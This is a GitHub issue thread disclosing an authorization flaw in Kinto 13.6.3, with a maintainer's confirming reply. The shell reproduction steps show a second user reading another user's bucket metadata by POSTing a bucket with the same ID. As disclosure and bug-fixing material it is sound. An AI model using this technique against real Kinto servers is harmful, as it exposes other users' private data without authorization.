### ISSUE TITLE
Possible security flaw?

### ISSUE THREAD

**Issue by dim** [Kinto/kinto#2459]
Here's are the steps to recreate the issue, tested with `kinto/kinto-server:13.6.3` Docker container, with `KINTO_BUCKET_CREATE_PRINCIPALS=system.Authenticated`

Create two users, `alice` and `bob`

```shell
docker exec -it $CID kinto create-user -u alice -p x
docker exec -it $CID kinto create-user -u bob -p x
```

Let `alice` create a bucket:

```shell
echo '{"data":{"id":"alices","secret":"metadata"}}' | http POST http://localhost:8888/v1/buckets --auth "alice:x"
# => HTTP/1.1 200 OK
```

Confirm that `bob` cannot access that bucket:

```shell
http GET http://localhost:8888/v1/buckets/alices --auth "bob:x"
# => HTTP/1.1 403 Forbidden
```

But, if `bob` tries to create a bucket with the same name, they *are* able to see it:

```shell
echo '{"data":{"id":"alices"}}' | http POST http://localhost:8888/v1/buckets --auth "bob:x"
# => HTTP/1.1 200 OK
# {
#     "data": {
#         "id": "alices",
#         "last_modified": 1584544849592,
#         "secret": "metadata"
#     },
#     "permissions": {}
# }
```

When trying to create objects with existing IDs Kinto returns the existing object. In this case `account:bob` has the `bucket:create` permissions but they don't have explicit `read` for a bucket created by `alice`.

**Comment by leplatrem** [comment]
Very good catch! That's a serious bug indeed. Before returning the object, we should check the `read` permission!
